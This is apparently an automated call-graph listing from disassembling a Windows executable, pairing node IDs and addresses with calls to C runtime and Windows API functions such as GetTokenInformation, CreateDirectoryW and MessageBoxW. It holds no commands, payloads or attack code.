16761->16752 16763 7ff62cc8303e 16762->16763 16768 7ff62cc8302e 16762->16768 16764 7ff62cc83047 16763->16764 16771 7ff62cc83075 16763->16771 16766 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16764->16766 16765 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16767 7ff62cc8306d 16765->16767 16766->16767 16767->16755 16767->16757 16767->16760 16767->16761 16768->16765 16771->16767 16771->16768 16773 7ff62cc83a14 16771->16773 16806 7ff62cc83460 16771->16806 16843 7ff62cc82bf0 16771->16843 16774 7ff62cc83ac7 16773->16774 16775 7ff62cc83a56 16773->16775 16778 7ff62cc83acc 16774->16778 16779 7ff62cc83b20 16774->16779 16776 7ff62cc83a5c 16775->16776 16777 7ff62cc83af1 16775->16777 16780 7ff62cc83a61 16776->16780 16781 7ff62cc83a90 16776->16781 16866 7ff62cc81dc4 16777->16866 16782 7ff62cc83b01 16778->16782 16783 7ff62cc83ace 16778->16783 16785 7ff62cc83b2a 16779->16785 16786 7ff62cc83b37 16779->16786 16790 7ff62cc83b2f 16779->16790 16780->16786 16788 7ff62cc83a67 16780->16788 16781->16788 16781->16790 16873 7ff62cc819b4 16782->16873 16784 7ff62cc83a70 16783->16784 16793 7ff62cc83add 16783->16793 16805 7ff62cc83b60 16784->16805 16846 7ff62cc841c8 16784->16846 16785->16777 16785->16790 16880 7ff62cc8471c 16786->16880 16788->16784 16794 7ff62cc83aa2 16788->16794 16803 7ff62cc83a8b 16788->16803 16790->16805 16884 7ff62cc821d4 16790->16884 16793->16777 16796 7ff62cc83ae2 16793->16796 16794->16805 16856 7ff62cc84504 16794->16856 16796->16805 16862 7ff62cc845c8 16796->16862 16798 7ff62cc7c5c0 _log10_special 8 API calls 16800 7ff62cc83e5a 16798->16800 16800->16771 16804 7ff62cc83d4c 16803->16804 16803->16805 16891 7ff62cc84830 16803->16891 16804->16805 16897 7ff62cc8ea78 16804->16897 16805->16798 16807 7ff62cc83484 16806->16807 16808 7ff62cc8346e 16806->16808 16811 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16807->16811 16812 7ff62cc834c4 16807->16812 16809 7ff62cc83ac7 16808->16809 16810 7ff62cc83a56 16808->16810 16808->16812 16815 7ff62cc83acc 16809->16815 16816 7ff62cc83b20 16809->16816 16813 7ff62cc83a5c 16810->16813 16814 7ff62cc83af1 16810->16814 16811->16812 16812->16771 16817 7ff62cc83a61 16813->16817 16818 7ff62cc83a90 16813->16818 16824 7ff62cc81dc4 38 API calls 16814->16824 16819 7ff62cc83b01 16815->16819 16820 7ff62cc83ace 16815->16820 16822 7ff62cc83b2a 16816->16822 16823 7ff62cc83b37 16816->16823 16827 7ff62cc83b2f 16816->16827 16817->16823 16825 7ff62cc83a67 16817->16825 16818->16825 16818->16827 16829 7ff62cc819b4 38 API calls 16819->16829 16821 7ff62cc83a70 16820->16821 16832 7ff62cc83add 16820->16832 16826 7ff62cc841c8 47 API calls 16821->16826 16842 7ff62cc83b60 16821->16842 16822->16814 16822->16827 16828 7ff62cc8471c 45 API calls 16823->16828 16840 7ff62cc83a8b 16824->16840 16825->16821 16830 7ff62cc83aa2 16825->16830 16825->16840 16826->16840 16831 7ff62cc821d4 38 API calls 16827->16831 16827->16842 16828->16840 16829->16840 16833 7ff62cc84504 46 API calls 16830->16833 16830->16842 16831->16840 16832->16814 16834 7ff62cc83ae2 16832->16834 16833->16840 16836 7ff62cc845c8 37 API calls 16834->16836 16834->16842 16835 7ff62cc7c5c0 _log10_special 8 API calls 16837 7ff62cc83e5a 16835->16837 16836->16840 16837->16771 16838 7ff62cc84830 45 API calls 16841 7ff62cc83d4c 16838->16841 16839 7ff62cc8ea78 46 API calls 16839->16841 16840->16838 16840->16841 16840->16842 16841->16839 16841->16842 16842->16835 17123 7ff62cc81038 16843->17123 16847 7ff62cc841ee 16846->16847 16909 7ff62cc80bf0 16847->16909 16852 7ff62cc84830 45 API calls 16853 7ff62cc84333 16852->16853 16854 7ff62cc84830 45 API calls 16853->16854 16855 7ff62cc843c1 16853->16855 16854->16855 16855->16803 16859 7ff62cc84539 16856->16859 16857 7ff62cc8457e 16857->16803 16858 7ff62cc84557 16860 7ff62cc8ea78 46 API calls 16858->16860 16859->16857 16859->16858 16861 7ff62cc84830 45 API calls 16859->16861 16860->16857 16861->16858 16863 7ff62cc845e9 16862->16863 16864 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16863->16864 16865 7ff62cc8461a 16863->16865 16864->16865 16865->16803 16867 7ff62cc81df7 16866->16867 16868 7ff62cc81e26 16867->16868 16870 7ff62cc81ee3 16867->16870 16872 7ff62cc81e63 16868->16872 17055 7ff62cc80c98 16868->17055 16871 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16870->16871 16871->16872 16872->16803 16875 7ff62cc819e7 16873->16875 16874 7ff62cc81a16 16876 7ff62cc80c98 12 API calls 16874->16876 16879 7ff62cc81a53 16874->16879 16875->16874 16877 7ff62cc81ad3 16875->16877 16876->16879 16878 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16877->16878 16878->16879 16879->16803 16881 7ff62cc8475f 16880->16881 16883 7ff62cc84763 __crtLCMapStringW 16881->16883 17063 7ff62cc847b8 16881->17063 16883->16803 16885 7ff62cc82207 16884->16885 16886 7ff62cc82236 16885->16886 16888 7ff62cc822f3 16885->16888 16887 7ff62cc80c98 12 API calls 16886->16887 16890 7ff62cc82273 16886->16890 16887->16890 16889 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16888->16889 16889->16890 16890->16803 16892 7ff62cc84847 16891->16892 17067 7ff62cc8da28 16892->17067 16898 7ff62cc8eaa9 16897->16898 16906 7ff62cc8eab7 16897->16906 16899 7ff62cc8ead7 16898->16899 16900 7ff62cc84830 45 API calls 16898->16900 16898->16906 16901 7ff62cc8eb0f 16899->16901 16902 7ff62cc8eae8 16899->16902 16900->16899 16904 7ff62cc8eb39 16901->16904 16905 7ff62cc8eb9a 16901->16905 16901->16906 17113 7ff62cc90110 16902->17113 16904->16906 17116 7ff62cc8f910 16904->17116 16907 7ff62cc8f910 _fread_nolock MultiByteToWideChar 16905->16907 16906->16804 16907->16906 16910 7ff62cc80c27 16909->16910 16915 7ff62cc80c16 16909->16915 16910->16915 16939 7ff62cc8d66c 16910->16939 16913 7ff62cc8a9b8 __free_lconv_num 11 API calls 16913->16915 16914 7ff62cc8a9b8 __free_lconv_num 11 API calls 16916 7ff62cc80c68 16914->16916 16917 7ff62cc8e5e0 16915->16917 16916->16913 16918 7ff62cc8e630 16917->16918 16919 7ff62cc8e5fd 16917->16919 16918->16919 16922 7ff62cc8e662 16918->16922 16920 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16919->16920 16921 7ff62cc84311 16920->16921 16921->16852 16921->16853 16927 7ff62cc8e775 16922->16927 16934 7ff62cc8e6aa 16922->16934 16923 7ff62cc8e867 16979 7ff62cc8dacc 16923->16979 16925 7ff62cc8e82d 16972 7ff62cc8de64 16925->16972 16927->16923 16927->16925 16928 7ff62cc8e7fc 16927->16928 16929 7ff62cc8e7bf 16927->16929 16931 7ff62cc8e7b5 16927->16931 16965 7ff62cc8e144 16928->16965 16955 7ff62cc8e374 16929->16955 16931->16925 16933 7ff62cc8e7ba 16931->16933 16933->16928 16933->16929 16934->16921 16946 7ff62cc8a514 16934->16946 16937 7ff62cc8a970 _isindst 17 API calls 16938 7ff62cc8e8c4 16937->16938 16940 7ff62cc8d6b7 16939->16940 16941 7ff62cc8d67b _get_daylight 16939->16941 16943 7ff62cc84f78 _get_daylight 11 API calls 16940->16943 16941->16940 16942 7ff62cc8d69e HeapAlloc 16941->16942 16945 7ff62cc93600 _get_daylight 2 API calls 16941->16945 16942->16941 16944 7ff62cc80c54 16942->16944 16943->16944 16944->16914 16944->16916 16945->16941 16947 7ff62cc8a521 16946->16947 16948 7ff62cc8a52b 16946->16948 16947->16948 16953 7ff62cc8a546 16947->16953 16949 7ff62cc84f78 _get_daylight 11 API calls 16948->16949 16950 7ff62cc8a532 16949->16950 16988 7ff62cc8a950 16950->16988 16952 7ff62cc8a53e 16952->16921 16952->16937 16953->16952 16954 7ff62cc84f78 _get_daylight 11 API calls 16953->16954 16954->16950 16991 7ff62cc9411c 16955->16991 16959 7ff62cc8e420 16959->16921 16960 7ff62cc8e471 17044 7ff62cc8df60 16960->17044 16961 7ff62cc8e41c 16961->16959 16961->16960 16962 7ff62cc8e43c 16961->16962 17040 7ff62cc8e21c 16962->17040 16966 7ff62cc9411c 38 API calls 16965->16966 16967 7ff62cc8e18e 16966->16967 16968 7ff62cc93b64 37 API calls 16967->16968 16969 7ff62cc8e1de 16968->16969 16970 7ff62cc8e1e2 16969->16970 16971 7ff62cc8e21c 45 API calls 16969->16971 16970->16921 16971->16970 16973 7ff62cc9411c 38 API calls 16972->16973 16974 7ff62cc8deaf 16973->16974 16975 7ff62cc93b64 37 API calls 16974->16975 16976 7ff62cc8df07 16975->16976 16977 7ff62cc8df0b 16976->16977 16978 7ff62cc8df60 45 API calls 16976->16978 16977->16921 16978->16977 16980 7ff62cc8db11 16979->16980 16981 7ff62cc8db44 16979->16981 16983 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 16980->16983 16982 7ff62cc8db5c 16981->16982 16986 7ff62cc8dbdd 16981->16986 16984 7ff62cc8de64 46 API calls 16982->16984 16985 7ff62cc8db3d memcpy_s 16983->16985 16984->16985 16985->16921 16986->16985 16987 7ff62cc84830 45 API calls 16986->16987 16987->16985 16989 7ff62cc8a7e8 _invalid_parameter_noinfo 37 API calls 16988->16989 16990 7ff62cc8a969 16989->16990 16990->16952 16992 7ff62cc9416f fegetenv 16991->16992 16993 7ff62cc97e9c 37 API calls 16992->16993 16997 7ff62cc941c2 16993->16997 16994 7ff62cc941ef 16999 7ff62cc8a514 __std_exception_copy 37 API calls 16994->16999 16995 7ff62cc942b2 16996 7ff62cc97e9c 37 API calls 16995->16996 16998 7ff62cc942dc 16996->16998 16997->16995 17001 7ff62cc941dd 16997->17001 17002 7ff62cc9428c 16997->17002 17003 7ff62cc97e9c 37 API calls 16998->17003 17000 7ff62cc9426d 16999->17000 17004 7ff62cc95394 17000->17004 17010 7ff62cc94275 17000->17010 17001->16994 17001->16995 17005 7ff62cc8a514 __std_exception_copy 37 API calls 17002->17005 17006 7ff62cc942ed 17003->17006 17007 7ff62cc8a970 _isindst 17 API calls 17004->17007 17005->17000 17008 7ff62cc98090 20 API calls 17006->17008 17009 7ff62cc953a9 17007->17009 17018 7ff62cc94356 memcpy_s 17008->17018 17011 7ff62cc7c5c0 _log10_special 8 API calls 17010->17011 17012 7ff62cc8e3c1 17011->17012 17036 7ff62cc93b64 17012->17036 17013 7ff62cc946ff memcpy_s 17014 7ff62cc94397 memcpy_s 17030 7ff62cc94cdb memcpy_s 17014->17030 17035 7ff62cc947f3 memcpy_s 17014->17035 17015 7ff62cc94a3f 17016 7ff62cc93c80 37 API calls 17015->17016 17022 7ff62cc95157 17016->17022 17017 7ff62cc949eb 17017->17015 17019 7ff62cc953ac memcpy_s 37 API calls 17017->17019 17018->17013 17018->17014 17020 7ff62cc84f78 _get_daylight 11 API calls 17018->17020 17019->17015 17021 7ff62cc947d0 17020->17021 17023 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 17021->17023 17025 7ff62cc953ac memcpy_s 37 API calls 17022->17025 17029 7ff62cc951b2 17022->17029 17023->17014 17024 7ff62cc95338 17028 7ff62cc97e9c 37 API calls 17024->17028 17025->17029 17026 7ff62cc84f78 11 API calls _get_daylight 17026->17030 17027 7ff62cc84f78 11 API calls _get_daylight 17027->17035 17028->17010 17029->17024 17031 7ff62cc93c80 37 API calls 17029->17031 17033 7ff62cc953ac memcpy_s 37 API calls 17029->17033 17030->17015 17030->17017 17030->17026 17034 7ff62cc8a950 37 API calls _invalid_parameter_noinfo 17030->17034 17031->17029 17032 7ff62cc8a950 37 API calls _invalid_parameter_noinfo 17032->17035 17033->17029 17034->17030 17035->17017 17035->17027 17035->17032 17037 7ff62cc93b83 17036->17037 17038 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17037->17038 17039 7ff62cc93bae memcpy_s 17037->17039 17038->17039 17039->16961 17041 7ff62cc8e248 memcpy_s 17040->17041 17042 7ff62cc84830 45 API calls 17041->17042 17043 7ff62cc8e302 memcpy_s 17041->17043 17042->17043 17043->16959 17045 7ff62cc8df9b 17044->17045 17048 7ff62cc8dfe8 memcpy_s 17044->17048 17046 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17045->17046 17047 7ff62cc8dfc7 17046->17047 17047->16959 17049 7ff62cc8e053 17048->17049 17051 7ff62cc84830 45 API calls 17048->17051 17050 7ff62cc8a514 __std_exception_copy 37 API calls 17049->17050 17054 7ff62cc8e095 memcpy_s 17050->17054 17051->17049 17052 7ff62cc8a970 _isindst 17 API calls 17053 7ff62cc8e140 17052->17053 17054->17052 17056 7ff62cc80cbe 17055->17056 17057 7ff62cc80ccf 17055->17057 17056->16872 17057->17056 17058 7ff62cc8d66c _fread_nolock 12 API calls 17057->17058 17059 7ff62cc80d00 17058->17059 17060 7ff62cc80d14 17059->17060 17061 7ff62cc8a9b8 __free_lconv_num 11 API calls 17059->17061 17062 7ff62cc8a9b8 __free_lconv_num 11 API calls 17060->17062 17061->17060 17062->17056 17064 7ff62cc847d6 17063->17064 17065 7ff62cc847de 17063->17065 17066 7ff62cc84830 45 API calls 17064->17066 17065->16883 17066->17065 17068 7ff62cc8da41 17067->17068 17069 7ff62cc8486f 17067->17069 17068->17069 17075 7ff62cc93374 17068->17075 17071 7ff62cc8da94 17069->17071 17072 7ff62cc8487f 17071->17072 17073 7ff62cc8daad 17071->17073 17072->16804 17073->17072 17110 7ff62cc926c0 17073->17110 17087 7ff62cc8b1c0 GetLastError 17075->17087 17078 7ff62cc933ce 17078->17069 17088 7ff62cc8b201 FlsSetValue 17087->17088 17089 7ff62cc8b1e4 FlsGetValue 17087->17089 17090 7ff62cc8b213 17088->17090 17106 7ff62cc8b1f1 17088->17106 17091 7ff62cc8b1fb 17089->17091 17089->17106 17093 7ff62cc8ec08 _get_daylight 11 API calls 17090->17093 17091->17088 17092 7ff62cc8b26d SetLastError 17095 7ff62cc8b27a 17092->17095 17096 7ff62cc8b28d 17092->17096 17094 7ff62cc8b222 17093->17094 17098 7ff62cc8b240 FlsSetValue 17094->17098 17099 7ff62cc8b230 FlsSetValue 17094->17099 17095->17078 17109 7ff62cc90348 EnterCriticalSection 17095->17109 17097 7ff62cc8a574 __CxxCallCatchBlock 38 API calls 17096->17097 17100 7ff62cc8b292 17097->17100 17102 7ff62cc8b25e 17098->17102 17103 7ff62cc8b24c FlsSetValue 17098->17103 17101 7ff62cc8b239 17099->17101 17104 7ff62cc8a9b8 __free_lconv_num 11 API calls 17101->17104 17105 7ff62cc8af64 _get_daylight 11 API calls 17102->17105 17103->17101 17104->17106 17107 7ff62cc8b266 17105->17107 17106->17092 17108 7ff62cc8a9b8 __free_lconv_num 11 API calls 17107->17108 17108->17092 17111 7ff62cc8b1c0 __CxxCallCatchBlock 45 API calls 17110->17111 17112 7ff62cc926c9 17111->17112 17119 7ff62cc96df8 17113->17119 17118 7ff62cc8f919 MultiByteToWideChar 17116->17118 17122 7ff62cc96e5c 17119->17122 17120 7ff62cc7c5c0 _log10_special 8 API calls 17121 7ff62cc9012d 17120->17121 17121->16906 17122->17120 17124 7ff62cc8106d 17123->17124 17125 7ff62cc8107f 17123->17125 17126 7ff62cc84f78 _get_daylight 11 API calls 17124->17126 17128 7ff62cc8108d 17125->17128 17131 7ff62cc810c9 17125->17131 17127 7ff62cc81072 17126->17127 17129 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 17127->17129 17130 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17128->17130 17139 7ff62cc8107d 17129->17139 17130->17139 17132 7ff62cc81445 17131->17132 17134 7ff62cc84f78 _get_daylight 11 API calls 17131->17134 17133 7ff62cc84f78 _get_daylight 11 API calls 17132->17133 17132->17139 17135 7ff62cc816d9 17133->17135 17136 7ff62cc8143a 17134->17136 17137 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 17135->17137 17138 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 17136->17138 17137->17139 17138->17132 17139->16771 17141 7ff62cc80774 17140->17141 17168 7ff62cc804d4 17141->17168 17143 7ff62cc8078d 17143->16305 17180 7ff62cc8042c 17144->17180 17148 7ff62cc7c8c0 17147->17148 17149 7ff62cc72930 GetCurrentProcessId 17148->17149 17150 7ff62cc71c80 49 API calls 17149->17150 17151 7ff62cc72979 17150->17151 17194 7ff62cc849f4 17151->17194 17156 7ff62cc71c80 49 API calls 17157 7ff62cc729ff 17156->17157 17224 7ff62cc72620 17157->17224 17160 7ff62cc7c5c0 _log10_special 8 API calls 17161 7ff62cc72a31 17160->17161 17161->16344 17163 7ff62cc80189 17162->17163 17165 7ff62cc71b89 17162->17165 17164 7ff62cc84f78 _get_daylight 11 API calls 17163->17164 17166 7ff62cc8018e 17164->17166 17165->16343 17165->16344 17167 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 17166->17167 17167->17165 17169 7ff62cc8053e 17168->17169 17170 7ff62cc804fe 17168->17170 17169->17170 17172 7ff62cc8054a 17169->17172 17171 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17170->17171 17173 7ff62cc80525 17171->17173 17179 7ff62cc854dc EnterCriticalSection 17172->17179 17173->17143 17181 7ff62cc80456 17180->17181 17192 7ff62cc71a20 17180->17192 17182 7ff62cc804a2 17181->17182 17183 7ff62cc80465 memcpy_s 17181->17183 17181->17192 17193 7ff62cc854dc EnterCriticalSection 17182->17193 17185 7ff62cc84f78 _get_daylight 11 API calls 17183->17185 17187 7ff62cc8047a 17185->17187 17190 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 17187->17190 17190->17192 17192->16312 17192->16313 17197 7ff62cc84a4e 17194->17197 17195 7ff62cc84a73 17196 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17195->17196 17211 7ff62cc84a9d 17196->17211 17197->17195 17198 7ff62cc84aaf 17197->17198 17233 7ff62cc82c80 17198->17233 17200 7ff62cc84b8c 17202 7ff62cc8a9b8 __free_lconv_num 11 API calls 17200->17202 17202->17211 17203 7ff62cc7c5c0 _log10_special 8 API calls 17204 7ff62cc729c3 17203->17204 17212 7ff62cc851d0 17204->17212 17205 7ff62cc84b61 17209 7ff62cc8a9b8 __free_lconv_num 11 API calls 17205->17209 17206 7ff62cc84bb0 17206->17200 17208 7ff62cc84bba 17206->17208 17207 7ff62cc84b58 17207->17200 17207->17205 17210 7ff62cc8a9b8 __free_lconv_num 11 API calls 17208->17210 17209->17211 17210->17211 17211->17203 17213 7ff62cc8b338 _get_daylight 11 API calls 17212->17213 17214 7ff62cc851e7 17213->17214 17215 7ff62cc729e5 17214->17215 17216 7ff62cc8ec08 _get_daylight 11 API calls 17214->17216 17218 7ff62cc85227 17214->17218 17215->17156 17217 7ff62cc8521c 17216->17217 17219 7ff62cc8a9b8 __free_lconv_num 11 API calls 17217->17219 17218->17215 17371 7ff62cc8ec90 17218->17371 17219->17218 17222 7ff62cc8a970 _isindst 17 API calls 17223 7ff62cc8526c 17222->17223 17225 7ff62cc7262f 17224->17225 17226 7ff62cc79400 2 API calls 17225->17226 17227 7ff62cc72660 17226->17227 17228 7ff62cc72683 MessageBoxA 17227->17228 17229 7ff62cc7266f MessageBoxW 17227->17229 17230 7ff62cc72690 17228->17230 17229->17230 17231 7ff62cc7c5c0 _log10_special 8 API calls 17230->17231 17232 7ff62cc726a0 17231->17232 17232->17160 17234 7ff62cc82cbe 17233->17234 17239 7ff62cc82cae 17233->17239 17235 7ff62cc82cc7 17234->17235 17244 7ff62cc82cf5 17234->17244 17237 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17235->17237 17236 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17238 7ff62cc82ced 17236->17238 17237->17238 17238->17200 17238->17205 17238->17206 17238->17207 17239->17236 17240 7ff62cc84830 45 API calls 17240->17244 17242 7ff62cc82fa4 17243 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17242->17243 17243->17239 17244->17238 17244->17239 17244->17240 17244->17242 17247 7ff62cc83610 17244->17247 17273 7ff62cc832d8 17244->17273 17303 7ff62cc82b60 17244->17303 17248 7ff62cc836c5 17247->17248 17249 7ff62cc83652 17247->17249 17252 7ff62cc836ca 17248->17252 17253 7ff62cc8371f 17248->17253 17250 7ff62cc83658 17249->17250 17251 7ff62cc836ef 17249->17251 17259 7ff62cc8365d 17250->17259 17262 7ff62cc8372e 17250->17262 17320 7ff62cc81bc0 17251->17320 17254 7ff62cc836cc 17252->17254 17255 7ff62cc836ff 17252->17255 17253->17251 17253->17262 17271 7ff62cc83688 17253->17271 17257 7ff62cc8366d 17254->17257 17261 7ff62cc836db 17254->17261 17327 7ff62cc817b0 17255->17327 17272 7ff62cc8375d 17257->17272 17306 7ff62cc83f74 17257->17306 17259->17257 17263 7ff62cc836a0 17259->17263 17259->17271 17261->17251 17265 7ff62cc836e0 17261->17265 17262->17272 17334 7ff62cc81fd0 17262->17334 17263->17272 17316 7ff62cc84430 17263->17316 17268 7ff62cc845c8 37 API calls 17265->17268 17265->17272 17267 7ff62cc7c5c0 _log10_special 8 API calls 17269 7ff62cc839f3 17267->17269 17268->17271 17269->17244 17271->17272 17341 7ff62cc8e8c8 17271->17341 17272->17267 17274 7ff62cc832f9 17273->17274 17275 7ff62cc832e3 17273->17275 17276 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17274->17276 17286 7ff62cc83337 17274->17286 17277 7ff62cc836c5 17275->17277 17278 7ff62cc83652 17275->17278 17275->17286 17276->17286 17281 7ff62cc836ca 17277->17281 17282 7ff62cc8371f 17277->17282 17279 7ff62cc83658 17278->17279 17280 7ff62cc836ef 17278->17280 17289 7ff62cc8365d 17279->17289 17292 7ff62cc8372e 17279->17292 17285 7ff62cc81bc0 38 API calls 17280->17285 17283 7ff62cc836cc 17281->17283 17284 7ff62cc836ff 17281->17284 17282->17280 17282->17292 17301 7ff62cc83688 17282->17301 17290 7ff62cc836db 17283->17290 17297 7ff62cc8366d 17283->17297 17287 7ff62cc817b0 38 API calls 17284->17287 17285->17301 17286->17244 17287->17301 17288 7ff62cc83f74 47 API calls 17288->17301 17291 7ff62cc836a0 17289->17291 17289->17297 17289->17301 17290->17280 17295 7ff62cc836e0 17290->17295 17294 7ff62cc84430 47 API calls 17291->17294 17302 7ff62cc8375d 17291->17302 17293 7ff62cc81fd0 38 API calls 17292->17293 17292->17302 17293->17301 17294->17301 17298 7ff62cc845c8 37 API calls 17295->17298 17295->17302 17296 7ff62cc7c5c0 _log10_special 8 API calls 17299 7ff62cc839f3 17296->17299 17297->17288 17297->17302 17298->17301 17299->17244 17300 7ff62cc8e8c8 47 API calls 17300->17301 17301->17300 17301->17302 17302->17296 17354 7ff62cc80d84 17303->17354 17307 7ff62cc83f96 17306->17307 17308 7ff62cc80bf0 12 API calls 17307->17308 17309 7ff62cc83fde 17308->17309 17310 7ff62cc8e5e0 46 API calls 17309->17310 17311 7ff62cc840b1 17310->17311 17313 7ff62cc840d3 17311->17313 17314 7ff62cc84830 45 API calls 17311->17314 17312 7ff62cc8415c 17312->17271 17313->17312 17315 7ff62cc84830 45 API calls 17313->17315 17314->17313 17315->17312 17317 7ff62cc84448 17316->17317 17319 7ff62cc844b0 17316->17319 17318 7ff62cc8e8c8 47 API calls 17317->17318 17317->17319 17318->17319 17319->17271 17322 7ff62cc81bf3 17320->17322 17321 7ff62cc81c22 17323 7ff62cc80bf0 12 API calls 17321->17323 17326 7ff62cc81c5f 17321->17326 17322->17321 17324 7ff62cc81cdf 17322->17324 17323->17326 17325 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17324->17325 17325->17326 17326->17271 17328 7ff62cc817e3 17327->17328 17329 7ff62cc81812 17328->17329 17331 7ff62cc818cf 17328->17331 17330 7ff62cc80bf0 12 API calls 17329->17330 17333 7ff62cc8184f 17329->17333 17330->17333 17332 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17331->17332 17332->17333 17333->17271 17335 7ff62cc82003 17334->17335 17336 7ff62cc82032 17335->17336 17338 7ff62cc820ef 17335->17338 17337 7ff62cc80bf0 12 API calls 17336->17337 17339 7ff62cc8206f 17336->17339 17337->17339 17340 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17338->17340 17339->17271 17340->17339 17342 7ff62cc8e8f0 17341->17342 17343 7ff62cc8e935 17342->17343 17345 7ff62cc84830 45 API calls 17342->17345 17347 7ff62cc8e8f5 memcpy_s 17342->17347 17350 7ff62cc8e91e memcpy_s 17342->17350 17343->17347 17343->17350 17351 7ff62cc90858 17343->17351 17344 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17344->17347 17345->17343 17347->17271 17350->17344 17350->17347 17352 7ff62cc9087c WideCharToMultiByte 17351->17352 17355 7ff62cc80dc3 17354->17355 17356 7ff62cc80db1 17354->17356 17358 7ff62cc80e0d 17355->17358 17360 7ff62cc80dd0 17355->17360 17357 7ff62cc84f78 _get_daylight 11 API calls 17356->17357 17359 7ff62cc80db6 17357->17359 17363 7ff62cc80eb6 17358->17363 17364 7ff62cc84f78 _get_daylight 11 API calls 17358->17364 17362 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 17359->17362 17361 7ff62cc8a884 _invalid_parameter_noinfo 37 API calls 17360->17361 17366 7ff62cc80dc1 17361->17366 17362->17366 17365 7ff62cc84f78 _get_daylight 11 API calls 17363->17365 17363->17366 17367 7ff62cc80eab 17364->17367 17368 7ff62cc80f60 17365->17368 17366->17244 17369 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 17367->17369 17370 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 17368->17370 17369->17363 17370->17366 17375 7ff62cc8ecad 17371->17375 17372 7ff62cc8ecb2 17373 7ff62cc8524d 17372->17373 17374 7ff62cc84f78 _get_daylight 11 API calls 17372->17374 17373->17215 17373->17222 17376 7ff62cc8ecbc 17374->17376 17375->17372 17375->17373 17378 7ff62cc8ecfc 17375->17378 17377 7ff62cc8a950 _invalid_parameter_noinfo 37 API calls 17376->17377 17377->17373 17378->17373 17379 7ff62cc84f78 _get_daylight 11 API calls 17378->17379 17379->17376 17381 7ff62cc78823 __std_exception_copy 17380->17381 17382 7ff62cc787a1 GetTokenInformation 17380->17382 17385 7ff62cc7883c 17381->17385 17386 7ff62cc78836 CloseHandle 17381->17386 17383 7ff62cc787c2 GetLastError 17382->17383 17384 7ff62cc787cd 17382->17384 17383->17381 17383->17384 17384->17381 17387 7ff62cc787e9 GetTokenInformation 17384->17387 17385->16362 17386->17385 17387->17381 17388 7ff62cc7880c 17387->17388 17388->17381 17389 7ff62cc78816 ConvertSidToStringSidW 17388->17389 17389->17381 17391 7ff62cc7c8c0 17390->17391 17392 7ff62cc72b74 GetCurrentProcessId 17391->17392 17393 7ff62cc726b0 48 API calls 17392->17393 17394 7ff62cc72bc7 17393->17394 17395 7ff62cc84c48 48 API calls 17394->17395 17396 7ff62cc72c10 MessageBoxW 17395->17396 17397 7ff62cc7c5c0 _log10_special 8 API calls 17396->17397 17398 7ff62cc72c40 17397->17398 17398->16372 17400 7ff62cc725e5 17399->17400 17401 7ff62cc84c48 48 API calls 17400->17401 17402 7ff62cc72604 17401->17402 17402->16388 17448 7ff62cc88804 17403->17448 17407 7ff62cc781cc 17406->17407 17408 7ff62cc79400 2 API calls 17407->17408 17409 7ff62cc781eb 17408->17409 17410 7ff62cc78206 ExpandEnvironmentStringsW 17409->17410 17411 7ff62cc781f3 17409->17411 17413 7ff62cc7822c __std_exception_copy 17410->17413 17412 7ff62cc72810 49 API calls 17411->17412 17414 7ff62cc781ff __std_exception_copy 17412->17414 17415 7ff62cc78243 17413->17415 17416 7ff62cc78230 17413->17416 17418 7ff62cc7c5c0 _log10_special 8 API calls 17414->17418 17420 7ff62cc78251 GetDriveTypeW 17415->17420 17421 7ff62cc782af 17415->17421 17417 7ff62cc72810 49 API calls 17416->17417 17417->17414 17489 7ff62cc915c8 17448->17489 17548 7ff62cc91340 17489->17548 17569 7ff62cc90348 EnterCriticalSection 17548->17569 17696 7ff62cc7455a 17695->17696 17697 7ff62cc79400 2 API calls 17696->17697 17698 7ff62cc7457f 17697->17698 17699 7ff62cc7c5c0 _log10_special 8 API calls 17698->17699 17700 7ff62cc745a7 17699->17700 17700->16424 17703 7ff62cc77e1e 17701->17703 17702 7ff62cc77f42 17706 7ff62cc7c5c0 _log10_special 8 API calls 17702->17706 17703->17702 17704 7ff62cc71c80 49 API calls 17703->17704 17705 7ff62cc77ea5 17704->17705 17705->17702 17708 7ff62cc71c80 49 API calls 17705->17708 17709 7ff62cc74550 10 API calls 17705->17709 17710 7ff62cc77efb 17705->17710 17707 7ff62cc77f73 17706->17707 17707->16424 17708->17705 17709->17705 17711 7ff62cc79400 2 API calls 17710->17711 17712 7ff62cc77f13 CreateDirectoryW 17711->17712 17712->17702 17712->17705 17714 7ff62cc71637 17713->17714 17715 7ff62cc71613 17713->17715 17716 7ff62cc745b0 108 API calls 17714->17716 17834 7ff62cc71050 17715->17834 17719 7ff62cc7164b 17716->17719 17718 7ff62cc71618 17720 7ff62cc7162e 17718->17720 17723 7ff62cc72710 54 API calls 17718->17723 17721 7ff62cc71682 17719->17721 17722 7ff62cc71653 17719->17722 17720->16424 17725 7ff62cc745b0 108 API calls 17721->17725 17724 7ff62cc84f78 _get_daylight 11 API calls 17722->17724 17723->17720 17726 7ff62cc71658 17724->17726 17727 